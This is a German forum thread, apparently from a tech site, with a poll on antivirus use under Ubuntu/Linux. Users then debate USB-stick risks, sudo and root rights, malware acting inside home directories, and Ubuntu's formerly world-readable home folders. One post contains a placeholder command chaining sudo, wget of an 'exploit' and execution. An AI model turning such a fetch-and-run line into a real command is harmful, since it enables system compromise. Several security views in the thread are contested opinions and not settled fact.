Wieviele nutzen kein Antivirus unter Ubuntu? Gibt es eine Statistik dazu?

Wer nutzt unter Linux ein Antivirus? Wenn ja - dann welches?

  • Kein Antivirus

    Stimmen: 81 88,0%
  • ClamAV

    Stimmen: 6 6,5%
  • Sophos

    Stimmen: 0 0,0%
  • ESET

    Stimmen: 2 2,2%
  • Dr. Web

    Stimmen: 0 0,0%
  • Sonstiges

    Stimmen: 3 3,3%

  • Umfrageteilnehmer
    92
Vielen Dank für die Antworten und die Teilnahme an der Umfrage! Habe nicht erwartet, dass so viele abstimmen, danke euch noch Mal!
 
Ich stelle fest, dass die überwältigende Mehrheit keinen Antivirus nutzt. Wenn jemand euch einen USB Stick weiterreicht (z.B. ein Kollege übergibt Dateien aufm Stick) trefft ihr besondere Vorkehrungen vor dem Anstecken?
 
AlexanderMa schrieb:
Ich stelle fest, dass die überwältigende Mehrheit keinen Antivirus nutzt.
Was auch logisch ist.
Antivirus lohnt (wenn überhaupt!) ohnehin nur für Windows. Nach originären Linux-Viren zu suchen kann man machen, kommt aber nicht viel bei herum.

Antivirus unter Linux (und für Linux) macht aus zwei Gründen keinen Sinn:
  1. In der Praxis sind Linux-Viren kaum ein Problem. Theoretisch spricht nichts dagegen Schadsoftware für Linux zu entwickeln. Aber es kommt halt kaum vor (lohnt offenbar noch nicht)
  2. Die Antivirenhersteller sind im Linux-Segment auch eher nicht so gut aufgestellt. Für Windows-Viren gibts da entsprechendes Know-How und Infrastruktur die dafür sorgt, das auftauchende Schädlinge schnell gefunden, rasch analysiert und dann darausfolgend zügig Updates an die Antivirenprogramme ausgeliefert werden.
    Das ist Du im Linux-Bereich nicht. Dementsprechend wenig hilfreich sind sie.
Warum sollte man also Antivirenprogramme einsetzen? Zumal Antivirenprogramme ja auch Nachteile haben. Denn sie vergrößern die Angriffsfläche.

AlexanderMa schrieb:
Wenn jemand euch einen USB Stick weiterreicht (z.B. ein Kollege übergibt Dateien aufm Stick) trefft ihr besondere Vorkehrungen vor dem Anstecken?
Um das zu beantworten, muss man sich erst mal über die möglichen Bedrohungen klar werden.

Was eine direkte potentielle Gefahr ist, sind natürlich ausführbare Dateien (Programme, Skripte). Sofern man die nicht ausführt ist man "safe".
Um hier die Gefahr des unabsichtlichen Ausführens zu verringern kann man den Stick auch non-executable mounten. Falls irgendwelche Autostart-Mechanismen da sind, sollte man die abschalten (üblicherweise hat man das nicht bzw. wird gefragt, bevor etwas vom Stick ausgeführt wird).

Datendateien sind ungefährlicher aber potentiell auch problematisch. Nämlich wenn man lokal ein Verarbeitungsprogramm hat, welches "exploitable" ist. Um das Risiko zu minimieren ist es ratsam (Security-)Updates immer zügig einzuspielen. Viele Linux-Distributionen machen das sogar schon automatisch.

Dann gibts noch die Möglichkeit das der Stick versucht auf Treiberebene anzugreifen. Den USB-Treiber oder den Dateisystemtreiber. Oder man greift sogar die Hardware direkt an. Es ist schwierig sich dagegen zu schützen. Üblicherweise kommt das aber auch recht selten vor.

Der häufigste Fall dürfte sein, das irgendein Windows-Virus auf dem Stick ist und der ist erst mal so nicht sonderlich gefährlich (wenngleich auch nicht total unproblematisch; schon allein wegen WINE).

Kurzum: Die Gefahr ist (zumindest zur Zeit) eher ein theoretisches Problem. Und die normalen Sicherheitsmaßnahmen (Updates) fangen hier die üblichen, relevanten Probleme ab.
 
Zuletzt bearbeitet:
  • Gefällt mir
Reaktionen: screwdriver0815, sedot, netzgestaltung und eine weitere Person
Außerdem braucht man ja um im System etwas zu ändern Root Rechte (z.B. über sudo) und somit auch das Passwort.
sudo apt update && sudo wget download-exploit && evil_stuff
sudo apt upgrade
funktioniert ja ohne Passwort nicht.

Gruß
R.G.
 
Zuletzt bearbeitet:
  • Gefällt mir
Reaktionen: leonavis
Zumindest bei sudo braucht man nicht unbedingt das Passwort. Je nach Konfiguration landet das Passwort für die nächsten 5 Minuten im Cache oder wird sogar gar nicht benötigt. Insofern bin ich nicht unbedingt ein Fan von sudo. Das bedeutet nicht, daß es bei korrekter Konfiguration irgendwie unsicher wäre, die Debatte sudo vs su ist sicherlich auch eine Debatte um die grundlegende Philosophie dahinter.
 
Damit das Passwort im Cache landen kann, muss es ja zumindest einmal eingegeben worden sein, also braucht man bei sudo ein Passwort.
Aber Du hast schon recht, wir brauchen das nicht weiter zu vertiefen.

Gruß
R.G.
 
rgbs schrieb:
Außerdem braucht man ja um im System etwas zu ändern Root Rechte
Root-Rechte braucht man auch nicht um Schaden anzurichten. Den die wesentlichen gefährdeten Daten sind ja (beim Desktop-Nutzer) im üblicherweise Home-Verzeichnis.
Und zum "festsetzen" braucht man root-Rechte auch nicht. Ausführbarer Kram kann genauso gut irgendwo im Home-Verzeichnis liegen und dann z.B. via ~/.bashrc gestartet werden.
 
Die Sicherheit ergibt sich doch dadurch, dass nicht irgendein böswillig herbeigeführtes Schadensereignis das System zerschießen kann.
Das haben sich schon die Entwickler von Unix recht gut überlegt, indem sie die Rechtevergabe für Dateien individuell geregelt haben.
Die Daten hat man doch eh noch irgendwo anders gesichert.

Gruß
R.G.
 
Ich will es mal so sagen:
rgbs schrieb:
Da Dir das System egal ist, brauchen wir ja nicht weiterzureden, weil ja ein intaktes System auch gar nichts damit zu tun hat, dass Daten entwendet werden können. Träum weiter.
Die Frage ist immer mit welchen Definitionen überhaupt gearbeitet wird.

Wenn mit "System" alles außer dem Home-Verzeichnis gemeint ist, dann hat ein intaktes System tatsächlich nicht allzu viel zu bedeuten. Ein normaler Benutzer-Account hat im Normalfall genug Rechte um auf alles wichtige zugreifen zu können. Der einzige Trost wäre, daß in einem solchen Szenario wenigstens noch das Backup bliebe. Vorausgesetzt es ist in dem Moment geschützt.

Ist mit "System" das Gesamtkonstrukt (inkl. Home-Verzeichnisse) gemeint, dann bedeutet ein kompromittierter Benutzer-Account natürlich automatisch, daß das gesamte System kompromittiert wurde.

Crypto-Malware bezieht ihr Gefährdungspotential ja nicht etwa daraus, daß sie irgendwelche Programmordner verschlüsseln würde, sondern die Gefahr besteht darin. daß die Nutzerdaten (also alles woran man ohne erweiterte Rechte drankommt) verschlüsselt werden.

Natürlich könnte man einwenden, daß Crypto-Malware die nicht im System-Kontext läuft naturgemäß relativ schnell entdeckt würde. Denn sobald ein Programm die verschlüsselten Daten verarbeiten will fliegt alles auf. Diese Entdeckungsgefahr kann aber verringert werden wenn nur Daten verschlüsselt werden auf die lange nicht mehr zugegriffen wurde.

Wenn es wirklich nur darum geht Nutzerdaten nach irgendwohin im Internet zu kopieren kommt eine geschickt programmierte Malware jedenfalls vollkommen ohne Root-Rechte aus. Allerdings bleibt die Frage, inwiefern dieser Malware-Typ für Normalnutzer relevant ist.

Letztendlich kommt es also vor allem darauf an welches Ziel eine Malware hat. Ist das Ziel sich auf Systemebene festzusetzen, dann ist ohne Root-Rechte nichts zu machen. Reicht es ausschließlich auf die Nutzerdaten zuzugreifen, dann sieht die Sache natürlich anders aus.
 
Serana schrieb:
... Ein normaler Benutzer-Account hat im Normalfall genug Rechte um auf alles wichtige zugreifen zu können.
Na dann ändere doch mal /etc/fstab ohne root Rechte.

Gruß
R.G.
 
  • Gefällt mir
Reaktionen: Bestagon
rgbs schrieb:
Na dann ändere doch mal /etc/fstab ohne root Rechte.
Wozu muss ich die /etc/fstab ändern wenn ich auf Dateien im Home-Verzeichnis zugreifen will? Darum geht es doch!

Klar ist es schlimm (sogar schlimmer!) wenn man (dank Root-Rechte) überall im System herummanipulieren kann. Das ist doch gar nicht die Frage und das stellt auch niemand in Abrede
Aber es ist häufig schon schlimm genug wenn man aufs Home-Verzeichnis zugreifen kann.
 
Na ja, und da Linux genau wie Unix ja ein Multi User System ist, kann ja auf mein Home Verzeichnis auch nur Jemand zugreifen, der dort auch mit meinem Passwort angemeldet ist. Ich verstehe folglich auch nicht, wie Du auf die Idee kommst, dass Dateien im Home Verzeichnis für Jeden zugänglich sind.
Und übers Netzwerk geht ja auch nicht so ganz einfach, dass ist ja dann die Sache mit Samba.
Und falls ich jetzt so blöd bin, die heruntergeladene Datei "Zerlege mir mein Home Verzeichnis" zum einen erst mal ausführbar zu machen und dann auch auszuführen, habe ich immer noch ein funktionierendes System um mein Backup wieder rücksichern zu können.

Gruß
R.G.
 
Zuletzt bearbeitet:
  • Gefällt mir
Reaktionen: Bestagon
rgbs schrieb:
Vollzitat entfrent
Ich habe es selbst nicht geglaubt, aber ja - jeder Nutzer des Rechners kann bei Ubuntu auf dein Home Verzeichnis mit Leserechten zugreifen…
 
Zuletzt bearbeitet von einem Moderator:
Soweit ich weiß wurde das jetzt bei der 21.04 geändert.

Gruß
R.G.
 
@AlexanderMa
Ja, das wurde erst kürzlich von Canonical korrigiert. Das war übles Problem von Ubuntu, allerdings kein allgemeines. Das in einer bestehenden Installation zu fixen ist übrigens kein Hexenwerk. Ich will das nicht schönreden, sondern nur darauf hinweisen.

Andere Distributionen haben das schon immer besser gemacht und die Verzeichnisrechte auf 700 gesetzt.
 
rgbs schrieb:
Vollzitat entfernt.
Das ist eine gute Nachricht 🙂
Jetzt sollen die noch den Gast Account wieder aufleben lassen, dann ist alles gut.
 
Zuletzt bearbeitet von einem Moderator:
den Gedanken Virenschutz (ja/nein) finde ich unter Linux durchaus interessant, da massenbedingt vorerst weniger bedrohlich gegenüber Windows. Lächerlich jedoch finde ich den Gedanken „Nichtschutz“ insofern, weil Linux noch eine Nische ist und insofern in der Nische bleibend auch keine Antivirus-Werbung "billig-profitabel" zu machen wäre. Bei Windows10 ist er immerhin bereits akzeptabel systeminklusive, was auch immer Nichtgläubige besserwissend zu antworten glauben. In 25J. Windows hatte ich erst einen lächerlichen Virenbefall (leider) durch Dummheit.
 
Zuletzt bearbeitet:
3x debian hier laufen und kein antivirus drauf.

grüße
 
Zurück
Oben